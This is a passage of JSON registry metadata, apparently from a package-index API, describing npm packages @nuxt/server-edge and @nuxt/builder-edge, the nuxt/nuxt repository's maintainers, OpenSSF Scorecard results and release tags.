s/GitHub/authors/warflash"},{"login":"ineshbose","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"wattanx","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"farnabaz","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"madebyfabian","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"lihbr","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"atinux","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"arashsheyda","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"}],"active_maintainers":[{"login":"danielroe","count":497,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":153,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"manniL","count":56,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"userquin","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"antfu","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"BobbieGoede","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"pi0","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Atinux","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"wattanx","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"atinux","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"madebyfabian","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"warflash","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"Hebilicious","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"lihbr","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"dargmuesli","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"arashsheyda","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fserver-edge/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fserver-edge/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fserver-edge/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fserver-edge/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fserver-edge/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fserver-edge/codemeta","maintainers":[{"uuid":"danielroe","login":"danielroe","name":null,"email":"daniel@roe.dev","url":null,"packages_count":434,"html_url":"https://www.npmjs.com/~danielroe","role":null,"created_at":"2026-02-10T21:33:39.965Z","updated_at":"2026-02-10T21:33:39.965Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/danielroe/packages"},{"uuid":"nuxtbot","login":"nuxtbot","name":null,"email":"nuxtbot@roe.dev","url":null,"packages_count":148,"html_url":"https://www.npmjs.com/~nuxtbot","role":null,"created_at":"2023-12-12T21:18:49.299Z","updated_at":"2023-12-12T21:18:49.299Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxtbot/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":1096083,"name":"@nuxt/builder-edge","ecosystem":"npm","description":null,"homepage":"https://github.com/nuxt/nuxt#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"nuxt","versions_count":1845,"first_release_published_at":"2018-10-17T22:29:08.108Z","latest_release_published_at":"2020-06-29T00:22:33.060Z","latest_release_number":"3.0.0-26556502.75dd90f2","last_synced_at":"2026-04-01T04:01:51.716Z","created_at":"2022-04-08T10:39:22.189Z","updated_at":"2026-04-01T04:01:51.716Z","registry_url":"https://www.npmjs.com/package/@nuxt/builder-edge","install_command":"npm install @nuxt/builder-edge","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"next":"3.0.0-26556502.75dd90f2","latest":"2.18.2-28661769.e265ef3"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Full-Stack Vue Framework.","archived":false,"fork":false,"pushed_at":"2026-02-13T11:08:58.000Z","size":134344,"stargazers_count":59568,"open_issues_count":935,"forks_count":5524,"subscribers_count":784,"default_branch":"main","last_synced_at":"2026-02-13T11:29:52.149Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2026-02-13T11:06:01.000Z","dependencies_parsed_at":"2024-12-25T13:30:54.580Z","dependency_job_id":"22cffcce-6e0a-4001-b86c-b81e60fdf77b","html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":7074,"total_committers":809,"mean_commits":8.744128553770086,"dds":0.6857506361323156,"last_synced_commit":"660f1720301b8d6487c89b6f86b4e7630573bca4"},"previous_names":["nuxt/nuxt.js","atinux/nuxt.js"],"tags_count":311,"template":false,"template_full_name":null,"purl":"pkg:github/nuxt/nuxt","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/sbom","scorecard":{"id":214668,"data":{"date":"2025-08-15T10:56:51Z","repo":{"name":"github.com/nuxt/nuxt","commit":"abf5d9e9f4a78a393a0ffbd8cfac8d24731217d6"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.4,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 14/23 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/cache-cleanup.yml:18","Warn: jobLevel 'actions' permission set to 'write': .github/workflows/cache-cleanup.yml:17","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/changelog.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/ci.yml:76","Info: jobLevel 'actions' permission set to 'read': .github/workflows/ci.yml:75","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:20","Info: jobLevel 'contents' permission set to 'read': .github/workflows/scorecards.yml:29","Info: jobLevel 'actions' permission set to 'read': .github/workflows/scorecards.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/semantic-pull-requests.yml:15","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/semantic-pull-requests.yml:16","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/semantic-pull-requests.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix-docs.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:9","Info: found token with 'none' permissions: .github/workflows/cache-cleanup.yml:1","Info: found token with 'none' permissions: .github/workflows/changelog.yml:1","Info: found token with 'none' permissions: .github/workflows/ci.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:15","Info: found token with 'none' permissions: .github/workflows/docs-check-links.yml:1","Info: found token with 'none' permissions: .github/workflows/docs-deploy.yml:1","Info: found token with 'none' permissions: .github/workflows/docs.yml:1","Info: found token with 'none' permissions: .github/workflows/label-pr.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-monorepo.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-workflows.yml:20","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-bridge.yml:1","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-website.yml:1","Info: found token with 'none' permissions: .github/workflows/release.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/scorecards.yml:18","Info: found token with 'none' permissions: .github/workflows/semantic-pull-requests.yml:1","Info: found token with 'none' permissions: .github/workflows/team-triage.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":10,"reason":"all dependencies are pinned","details":["Info:  59 out of  59 GitHub-owned GitHubAction dependencies pinned","Info:  28 out of  28 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 22 commits out of 24 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":5,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'allow deletion' disabled on branch '3.x'","Info: 'force pushes' disabled on branch 'main'","Info: 'force pushes' disabled on branch '3.x'","Warn: 'branch protection settings apply to administrators' is disabled on branch 'main'","Warn: 'branch protection settings apply to administrators' is disabled on branch '3.x'","Warn: 'stale review dismissal' is disabled on branch 'main'","Warn: 'stale review dismissal' is disabled on branch '3.x'","Warn: required approving review count is 1 on branch 'main'","Warn: required approving review count is 1 on branch '3.x'","Info: codeowner review is required on branch 'main'","Info: codeowner review is required on branch '3.x'","Info: 'last push approval' is required to merge on branch 'main'","Info: 'last push approval' is required to merge on branch '3.x'","Warn: 'up-to-date branches' is disabled on branch 'main'","Warn: 'up-to-date branches' is disabled on branch '3.x'","Info: status check found to merge onto on branch 'main'","Info: status check found to merge onto on branch '3.x'","Info: PRs are required in order to make changes on branch 'main'","Info: PRs are required in order to make changes on branch '3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"24 out of 24 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 77 contributing companies or organizations","details":["Info: found contributions from: D2Arsenal, DescendantGG, Developmint, GitHub-Stars, HelloAsso, HubSpot, JabRef, Lottomerkury, MetridashCore, Strawbei, Tresjs, WinterTC55, Zettlr, acquiredigital, albionstatus, alibaba-aero, antfu-collective, antfu-sponsors, benevolt, bootstrap-vue, codecember-ink, ecosystem-ci, elk-zone, esbuild-kit, eslint-stylistic, fse-employability, github-beta, gridsome, gubutler, h3js, helloasso, intlify, jabama-co, javascript-compiler-hints, knightlyjs, krutie patel, leetchi, lottomerkury sp. z o.o., mash-up, masters-info-nantes, mdit-vue, myself, nitrojs, nuxt, nuxt-community, nuxt-contrib, nuxt-modules, nuxtlabs, oxc-project, passionatepeople, shikijs, singularit-de, slidevjs, tastejs, tsperf, twoslashes, type-challenges, unjs, unjs . @nitrojs . @h3js . @nuxt, unocss, unplugin, vercel, vite-pwa, vitejs, vitest-dev, voidzero-dev, vue-reactivity, vue-terminal, vuejs, vuejs @vitejs @vueuse, vuejs-jp, vuetifyjs, vueuse, we-dance, webfansplz-sponsors, wenyan-lang, windicss"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-17T01:26:04.118Z","repository_id":37288797,"created_at":"2025-08-17T01:26:04.118Z","updated_at":"2025-08-17T01:26:04.118Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":29414277,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-02-13T06:24:03.484Z","status":"ssl_error","status_checked_at":"2026-02-13T06:23:12.830Z","response_time":78,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"nuxt","name":"Nuxt","uuid":"23360933","kind":"organization","description":"The Intuitive Vue Framework","email":null,"website":"https://nuxt.com","location":"Global","twitter":"nuxt_js","company":null,"icon_url":"https://avatars.githubusercontent.com/u/23360933?v=4","repositories_count":62,"last_synced_at":"2026-01-11T15:52:13.608Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/nuxt","funding_links":["https://github.com/sponsors/nuxt"],"total_stars":116453,"followers":4523,"following":0,"created_at":"2022-11-02T16:30:40.909Z","updated_at":"2026-01-11T15:52:13.608Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt/repositories"},"tags":[{"name":"v3.21.0","sha":"dbb5e73ec8e99fe1b3c646c112884210c8714298","kind":"commit","published_at":"2026-01-22T23:01:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.21.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.21.0/manifests"},{"name":"v4.3.0","sha":"b5bd7d9195bbd1c9cb174d43f6da2912fbd40bd3","kind":"commit","published_at":"2026-01-22T22:59:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.3.0/manifests"},{"name":"v4.2.2","sha":"185ae0f6da6cac51c1dcc010b8ca1ae7d5fee518","kind":"commit","published_at":"2025-12-09T17:16:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.2/manifests"},{"name":"v3.20.2","sha":"06449a8a7696bb090b6174adabea1b5a40bc5333","kind":"commit","published_at":"2025-12-09T17:10:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.20.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.2/manifests"},{"name":"v4.2.1","sha":"67ec213b30b0b1cd937d90d72664d19b62e4f830","kind":"commit","published_at":"2025-11-06T23:49:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.1/manifests"},{"name":"v3.20.1","sha":"1d2ee45924109c5726562cd11aaabc7ef9b963f8","kind":"commit","published_at":"2025-11-06T23:49:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.20.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.1/manifests"},{"name":"v3.20.0","sha":"617b266c732267755a8771b967d693b32e74fca4","kind":"commit","published_at":"2025-10-28T10:58:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.20.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.20.0/manifests"},{"name":"v4.2.0","sha":"be83cda268dec7a6e8b6a00d2777bfffb6435a83","kind":"commit","published_at":"2025-10-25T05:54:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.2.0/manifests"},{"name":"v4.1.3","sha":"2311b272f5935b82766dd9365fb7d81f72310ec2","kind":"commit","published_at":"2025-10-06T15:52:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.3/manifests"},{"name":"v3.19.3","sha":"f8874385b630b713a8dc0b85a98b64b982dc89ef","kind":"commit","published_at":"2025-10-06T15:47:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.3/manifests"},{"name":"v4.1.2","sha":"412786a1d8283aaa2360a855d44ebd3ac21924f1","kind":"commit","published_at":"2025-09-12T21:44:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.2/manifests"},{"name":"v3.19.2","sha":"350813b5a0b5f1b7f12ff95185e0a5946b42d625","kind":"commit","published_at":"2025-09-12T21:40:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.19.2/manifests"},{"name":"v4.1.1","sha":"f09180c493abb21b76ca26365ec21a77232f5f8d","kind":"commit","published_at":"2025-09-05T22:25:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.1.1/manifests"},{"name":"v3.19.1","sha":"544a76ff39e3064b507ed62cd17b1b5dcded7c90","kind":"commit","published_at":"2025-09-05T22:17:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.19.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.19.1",